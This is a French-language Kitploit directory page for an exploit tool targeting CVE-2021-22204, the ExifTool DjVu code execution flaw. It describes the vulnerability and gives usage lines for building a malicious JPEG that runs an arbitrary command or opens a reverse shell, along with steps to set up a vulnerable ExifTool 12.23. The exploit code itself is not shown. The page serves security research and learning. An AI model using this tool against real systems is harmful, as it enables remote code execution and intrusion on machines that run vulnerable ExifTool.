Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
exploit-CVE-2021-22204 — Exploit pour CVE-2021-22204 (ExifTool) - Exécution de code arbitraire | Kitploit
Outils/GitHubGitHub/unicordev/exploit-cve-2021-22204
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubunicordev/exploit-cve-2021-22204

exploit-CVE-2021-22204

Exploit pour CVE-2021-22204 (ExifTool) - Exécution de code arbitraire

Voir le dépôt
536il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

Exploit pour CVE-2021-22204 (ExifTool) - Exécution de code arbitraire

GitHub CVE Cover

Vous aimez ce dépôt ? Donnez-nous une ⭐ !

À des fins éducatives et de recherche en sécurité autorisées uniquement.

Auteur de l'exploit

@UNICORDev par (@NicPWNs et @Dev-Yeoj)

Description de la vulnérabilité

La neutralisation incorrecte des données utilisateur dans le format de fichier DjVu dans ExifTool versions 7.44 et ultérieures permet l'exécution de code arbitraire lors de l'analyse de l'image malveillante.

Description de l'exploit

Utilisez cet exploit pour générer une charge utile d'image JPEG pouvant être utilisée avec une version vulnérable d'ExifTool pour l'exécution de code. Une commande personnalisée peut être fournie ou un shell inversé peut être généré. Une image JPEG est automatiquement générée et, facultativement, une image JPEG personnalisée peut être fournie pour y insérer la charge utile.

Utilisation

root@kitploit:~
  python3 exploit-CVE-2021-22204.py -c <command>
  python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
  python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
  python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
  python3 exploit-CVE-2021-22204.py -h

Options

root@kitploit:~
  -c    Custom command mode. Provide command to execute.
  -s    Reverse shell mode. Provide local IP and port.
  -i    Path to custom JPEG image. (Optional)
  -h    Show this help menu.

Téléchargement

Télécharger exploit-CVE-2021-22204.py depuis GitHub

Télécharger exploit-CVE-2021-22204.py depuis ExploitDB

Searchsploit (ExploitDB)

root@kitploit:~
searchsploit -u
searchsploit -m 50911

Prérequis de l'exploit

  • python3
  • djvulibre-bin
  • exiftool

Démo

Demo Gif

Testé sur

Exiftool Version 12.23

S'applique à

Exiftool Versions 7.44 - 12.23

Environnement vulnérable

root@kitploit:~
wget https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
unzip exiftool-12.23.zip
cd exiftool-12.23
perl Makefile.PL
make test
sudo make install
exiftool -ver

Tester la charge utile générée

root@kitploit:~
exiftool image.jpg

Crédits

  • https://hackerone.com/reports/1154542
  • https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
  • https://nvd.nist.gov/vuln/detail/CVE-2021-22204
  • https://app.hackthebox.com/machines/Overflow
  • https://www.exploit-db.com/exploits/50911
Télécharger l’outil